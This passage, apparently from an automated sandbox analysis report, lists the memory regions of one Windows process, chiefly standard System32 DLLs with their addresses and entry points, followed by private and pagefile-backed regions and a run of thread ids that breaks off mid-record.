1765 start_va = 0x7ffb4f720000 end_va = 0x7ffb4f746fff monitored = 0 entry_point = 0x7ffb4f723bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1766 start_va = 0x7ffb4f790000 end_va = 0x7ffb4f821fff monitored = 0 entry_point = 0x7ffb4f7da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1767 start_va = 0x7ffb4f980000 end_va = 0x7ffb4f9d4fff monitored = 0 entry_point = 0x7ffb4f98fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1768 start_va = 0x7ffb4f9e0000 end_va = 0x7ffb4f9f2fff monitored = 0 entry_point = 0x7ffb4f9e57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1769 start_va = 0x7ffb4fa00000 end_va = 0x7ffb4fa79fff monitored = 0 entry_point = 0x7ffb4fa27630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1770 start_va = 0x7ffb4fa80000 end_va = 0x7ffb4fa89fff monitored = 0 entry_point = 0x7ffb4fa81660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1771 start_va = 0x7ffb4fa90000 end_va = 0x7ffb4faa7fff monitored = 0 entry_point = 0x7ffb4fa95910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1772 start_va = 0x7ffb4fab0000 end_va = 0x7ffb4fbfcfff monitored = 0 entry_point = 0x7ffb4faf3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1773 start_va = 0x7ffb4fc00000 end_va = 0x7ffb4fc1dfff monitored = 0 entry_point = 0x7ffb4fc03a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1774 start_va = 0x7ffb4fc20000 end_va = 0x7ffb4fc3efff monitored = 0 entry_point = 0x7ffb4fc24960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1775 start_va = 0x7ffb4fc40000 end_va = 0x7ffb4fca3fff monitored = 0 entry_point = 0x7ffb4fc55ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1776 start_va = 0x7ffb4fea0000 end_va = 0x7ffb4fec8fff monitored = 0 entry_point = 0x7ffb4feaca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1777 start_va = 0x7ffb4fed0000 end_va = 0x7ffb4ff05fff monitored = 0 entry_point = 0x7ffb4fee0070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1778 start_va = 0x7ffb50780000 end_va = 0x7ffb50787fff monitored = 0 entry_point = 0x7ffb507813e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1779 start_va = 0x7ffb509d0000 end_va = 0x7ffb50a0ffff monitored = 0 entry_point = 0x7ffb509e1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1780 start_va = 0x7ffb50c30000 end_va = 0x7ffb510c2fff monitored = 0 entry_point = 0x7ffb50c3f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1781 start_va = 0x7ffb510d0000 end_va = 0x7ffb51136fff monitored = 0 entry_point = 0x7ffb510ee710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1782 start_va = 0x7ffb519f0000 end_va = 0x7ffb51b75fff monitored = 0 entry_point = 0x7ffb51a3d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1783 start_va = 0x7ffb51b80000 end_va = 0x7ffb51b9bfff monitored = 0 entry_point = 0x7ffb51b837a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1784 start_va = 0x7ffb51ba0000 end_va = 0x7ffb51baafff monitored = 0 entry_point = 0x7ffb51ba1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1785 start_va = 0x7ffb51be0000 end_va = 0x7ffb51bf2fff monitored = 0 entry_point = 0x7ffb51be2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1786 start_va = 0x7ffb51c90000 end_va = 0x7ffb51c99fff monitored = 0 entry_point = 0x7ffb51c91350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1787 start_va = 0x7ffb51df0000 end_va = 0x7ffb51e85fff monitored = 0 entry_point = 0x7ffb51e15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1788 start_va = 0x7ffb51e90000 end_va = 0x7ffb51eb6fff monitored = 0 entry_point = 0x7ffb51e97940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1789 start_va = 0x7ffb51ee0000 end_va = 0x7ffb51f89fff monitored = 0 entry_point = 0x7ffb51f07910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1790 start_va = 0x7ffb51f90000 end_va = 0x7ffb5208ffff monitored = 0 entry_point = 0x7ffb51fd0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1791 start_va = 0x7ffb52120000 end_va = 0x7ffb5212bfff monitored = 0 entry_point = 0x7ffb52122480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1792 start_va = 0x7ffb522f0000 end_va = 0x7ffb52321fff monitored = 0 entry_point = 0x7ffb52302340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1793 start_va = 0x7ffb52460000 end_va = 0x7ffb5246bfff monitored = 0 entry_point = 0x7ffb52462790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1794 start_va = 0x7ffb52470000 end_va = 0x7ffb52493fff monitored = 0 entry_point = 0x7ffb52473260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1795 start_va = 0x7ffb52610000 end_va = 0x7ffb52703fff monitored = 0 entry_point = 0x7ffb5261a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1796 start_va = 0x7ffb52760000 end_va = 0x7ffb527a8fff monitored = 0 entry_point = 0x7ffb5276a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1797 start_va = 0x7ffb52880000 end_va = 0x7ffb5288bfff monitored = 0 entry_point = 0x7ffb528827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1798 start_va = 0x7ffb528c0000 end_va = 0x7ffb528ccfff monitored = 0 entry_point = 0x7ffb528c1fe0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1799 start_va = 0x7ffb52960000 end_va = 0x7ffb52990fff monitored = 0 entry_point = 0x7ffb52967d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1800 start_va = 0x7ffb529c0000 end_va = 0x7ffb52a39fff monitored = 0 entry_point = 0x7ffb529e1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1801 start_va = 0x7ffb52a80000 end_va = 0x7ffb52ab3fff monitored = 0 entry_point = 0x7ffb52a9ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1802 start_va = 0x7ffb52ac0000 end_va = 0x7ffb52ac9fff monitored = 0 entry_point = 0x7ffb52ac1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1803 start_va = 0x7ffb52bd0000 end_va = 0x7ffb52beefff monitored = 0 entry_point = 0x7ffb52bd5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1804 start_va = 0x7ffb52d40000 end_va = 0x7ffb52d9bfff monitored = 0 entry_point = 0x7ffb52d56f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1805 start_va = 0x7ffb52df0000 end_va = 0x7ffb52e06fff monitored = 0 entry_point = 0x7ffb52df79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1806 start_va = 0x7ffb52f10000 end_va = 0x7ffb52f1afff monitored = 0 entry_point = 0x7ffb52f119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1807 start_va = 0x7ffb52f50000 end_va = 0x7ffb52f70fff monitored = 0 entry_point = 0x7ffb52f60250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1808 start_va = 0x7ffb52fa0000 end_va = 0x7ffb52fd9fff monitored = 0 entry_point = 0x7ffb52fa8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1809 start_va = 0x7ffb52fe0000 end_va = 0x7ffb53006fff monitored = 0 entry_point = 0x7ffb52ff0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1810 start_va = 0x7ffb530f0000 end_va = 0x7ffb5311cfff monitored = 0 entry_point = 0x7ffb53109d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1811 start_va = 0x7ffb53280000 end_va = 0x7ffb532d5fff monitored = 0 entry_point = 0x7ffb53290bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1812 start_va = 0x7ffb532e0000 end_va = 0x7ffb532f8fff monitored = 0 entry_point = 0x7ffb532e5e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1813 start_va = 0x7ffb53300000 end_va = 0x7ffb53328fff monitored = 0 entry_point = 0x7ffb53314530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1814 start_va = 0x7ffb53330000 end_va = 0x7ffb533c8fff monitored = 0 entry_point = 0x7ffb5335f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1815 start_va = 0x7ffb53470000 end_va = 0x7ffb5347efff monitored = 0 entry_point = 0x7ffb53473210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1816 start_va = 0x7ffb53480000 end_va = 0x7ffb534cafff monitored = 0 entry_point = 0x7ffb534835f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1817 start_va = 0x7ffb534d0000 end_va = 0x7ffb534e3fff monitored = 0 entry_point = 0x7ffb534d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1818 start_va = 0x7ffb534f0000 end_va = 0x7ffb534fffff monitored = 0 entry_point = 0x7ffb534f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1819 start_va = 0x7ffb53500000 end_va = 0x7ffb53516fff monitored = 0 entry_point = 0x7ffb53501390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1820 start_va = 0x7ffb53520000 end_va = 0x7ffb53b63fff monitored = 0 entry_point = 0x7ffb536e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1821 start_va = 0x7ffb53b70000 end_va = 0x7ffb53d57fff monitored = 0 entry_point = 0x7ffb53b9ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1822 start_va = 0x7ffb53d60000 end_va = 0x7ffb53f26fff monitored = 0 entry_point = 0x7ffb53dbdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1823 start_va = 0x7ffb53f30000 end_va = 0x7ffb53f84fff monitored = 0 entry_point = 0x7ffb53f47970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1824 start_va = 0x7ffb54040000 end_va = 0x7ffb540c5fff monitored = 0 entry_point = 0x7ffb5404d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1825 start_va = 0x7ffb540d0000 end_va = 0x7ffb54139fff monitored = 0 entry_point = 0x7ffb54106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1826 start_va = 0x7ffb54140000 end_va = 0x7ffb541f4fff monitored = 0 entry_point = 0x7ffb541822e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1827 start_va = 0x7ffb54200000 end_va = 0x7ffb54242fff monitored = 0 entry_point = 0x7ffb54214b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1828 start_va = 0x7ffb543d0000 end_va = 0x7ffb5464cfff monitored = 0 entry_point = 0x7ffb544a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1829 start_va = 0x7ffb54670000 end_va = 0x7ffb54677fff monitored = 0 entry_point = 0x7ffb54671ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1830 start_va = 0x7ffb54680000 end_va = 0x7ffb547d5fff monitored = 0 entry_point = 0x7ffb5468a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1831 start_va = 0x7ffb547e0000 end_va = 0x7ffb5483bfff monitored = 0 entry_point = 0x7ffb547fb720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1832 start_va = 0x7ffb54840000 end_va = 0x7ffb548dcfff monitored = 0 entry_point = 0x7ffb548478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1833 start_va = 0x7ffb548e0000 end_va = 0x7ffb54a65fff monitored = 0 entry_point = 0x7ffb5492ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1834 start_va = 0x7ffb54a70000 end_va = 0x7ffb54adafff monitored = 0 entry_point = 0x7ffb54a890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1835 start_va = 0x7ffb54e50000 end_va = 0x7ffb54f92fff monitored = 0 entry_point = 0x7ffb54e78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1836 start_va = 0x7ffb54fa0000 end_va = 0x7ffb55046fff monitored = 0 entry_point = 0x7ffb54fb58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1837 start_va = 0x7ffb55050000 end_va = 0x7ffb550fcfff monitored = 0 entry_point = 0x7ffb550681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1838 start_va = 0x7ffb55100000 end_va = 0x7ffb5515afff monitored = 0 entry_point = 0x7ffb551138b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1839 start_va = 0x7ffb55160000 end_va = 0x7ffb5527bfff monitored = 0 entry_point = 0x7ffb551a02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1840 start_va = 0x7ffb55280000 end_va = 0x7ffb55326fff monitored = 0 entry_point = 0x7ffb5528b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1841 start_va = 0x7ffb55340000 end_va = 0x7ffb55768fff monitored = 0 entry_point = 0x7ffb55368740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1842 start_va = 0x7ffb55770000 end_va = 0x7ffb56ccefff monitored = 0 entry_point = 0x7ffb558d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1843 start_va = 0x7ffb56cd0000 end_va = 0x7ffb56d90fff monitored = 0 entry_point = 0x7ffb56cf0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1844 start_va = 0x7ffb56df0000 end_va = 0x7ffb56e41fff monitored = 0 entry_point = 0x7ffb56dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1845 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1866 start_va = 0xe2b2b00000 end_va = 0xe2b2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2b00000" filename = "" Region: id = 1867 start_va = 0xe2b2c00000 end_va = 0xe2b2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2c00000" filename = "" Region: id = 1868 start_va = 0xe2b2d00000 end_va = 0xe2b2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2d00000" filename = "" Region: id = 2057 start_va = 0xe2b2e00000 end_va = 0xe2b2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2e00000" filename = "" Region: id = 2058 start_va = 0xe2b2f00000 end_va = 0xe2b2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2f00000" filename = "" Region: id = 2061 start_va = 0x2473d2b0000 end_va = 0x2473d2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2b0000" filename = "" Region: id = 2275 start_va = 0xe2b3000000 end_va = 0xe2b30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3000000" filename = "" Region: id = 2280 start_va = 0xe2b3100000 end_va = 0xe2b31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3100000" filename = "" Region: id = 2306 start_va = 0x2473d2b0000 end_va = 0x2473d2b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2b0000" filename = "" Region: id = 2322 start_va = 0xe2b3200000 end_va = 0xe2b32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3200000" filename = "" Region: id = 2323 start_va = 0x2473d2c0000 end_va = 0x2473d2cbfff monitored = 0 entry_point = 0x2473d2c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2324 start_va = 0x2473d2c0000 end_va = 0x2473d2cbfff monitored = 0 entry_point = 0x2473d2c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2337 start_va = 0xe2b3300000 end_va = 0xe2b33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3300000" filename = "" Region: id = 2338 start_va = 0xe2b3400000 end_va = 0xe2b34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3400000" filename = "" Region: id = 2351 start_va = 0x2473d2b0000 end_va = 0x2473d2b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2b0000" filename = "" Region: id = 2398 start_va = 0x2473d2c0000 end_va = 0x2473d2c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2c0000" filename = "" Region: id = 2504 start_va = 0x2473d2b0000 end_va = 0x2473d2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2b0000" filename = "" Region: id = 2664 start_va = 0x2473d2b0000 end_va = 0x2473d2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2b0000" filename = "" Region: id = 2667 start_va = 0xe2b3500000 end_va = 0xe2b35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3500000" filename = "" Region: id = 2668 start_va = 0xe2b3600000 end_va = 0xe2b36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3600000" filename = "" Region: id = 2674 start_va = 0x2473d2b0000 end_va = 0x2473d2d0fff monitored = 0 entry_point = 0x2473d2b2300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2675 start_va = 0x2473d700000 end_va = 0x2473d712fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 2676 start_va = 0x2473d2b0000 end_va = 0x2473d2d0fff monitored = 0 entry_point = 0x2473d2b2300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2677 start_va = 0x2473d700000 end_va = 0x2473d712fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 2678 start_va = 0x2473d2b0000 end_va = 0x2473d2d0fff monitored = 0 entry_point = 0x2473d2b2300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2679 start_va = 0x2473d700000 end_va = 0x2473d712fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 2680 start_va = 0x2473d2b0000 end_va = 0x2473d2b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2b0000" filename = "" Region: id = 2681 start_va = 0x2473d2c0000 end_va = 0x2473d2c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2c0000" filename = "" Region: id = 2682 start_va = 0xe2b3700000 end_va = 0xe2b37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3700000" filename = "" Region: id = 2683 start_va = 0xe2b3800000 end_va = 0xe2b38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3800000" filename = "" Region: id = 2684 start_va = 0xe2b3a00000 end_va = 0xe2b3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3a00000" filename = "" Region: id = 2685 start_va = 0xe2b3a80000 end_va = 0xe2b3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b3a80000" filename = "" Region: id = 2686 start_va = 0x2473d2b0000 end_va = 0x2473d2b1fff monitored = 0 entry_point = 0x2473d2b5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2687 start_va = 0x2473d2d0000 end_va = 0x2473d2d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Thread: id = 66 os_tid = 0xb64 Thread: id = 67 os_tid = 0x85c Thread: id = 68 os_tid = 0x13a4 Thread: id = 69 os_tid = 0x11ac Thread: id = 70 os_tid = 0x11c4 Thread: id = 71 os_tid = 0x1120 Thread: id = 72 os_tid = 0x111c Thread: id = 73 os_tid = 0x10f4 Thread: id = 74 os_tid = 0x10a0 Thread: id = 75 os_tid = 0x1094 Thread: id = 76 os_tid = 0xd94 Thread: id = 77 os_tid = 0x45c Thread: id = 78 os_tid = 0x5dc Thread: id = 79 os_tid = 0xa40 Thread: id = 80 os_tid = 0x6b4 Thread: id = 81 os_tid = 0x5c0 Thread: id = 82 os_tid = 0xbd8 Thread: id = 83 os_tid = 0xb34 Thread: id = 84 os_tid = 0x3e8 Thread: id = 85 os_tid = 0x278 Thread: id = 86 os_tid = 0xb8 Thread: id = 87 os_tid = 0x468 Thread: id = 88 os_tid = 0x7f4 Thread: id = 89 os_tid = 0x6a0 Thread: id = 90 os_tid = 0xbb8 Thread: id = 91 os_tid = 0x5e8 Thread: id = 92 os_tid = 0x8f4 Thread: id = 93 os_tid = 0x638 Thread: id = 94 os_tid = 0x644 Thread: id = 95 os_tid = 0xb60 Thread: id = 96 os_tid = 0xac4 Thread: id = 97 os_tid = 0x994 Thread: id = 98 os_tid = 0xa58 Thread: id = 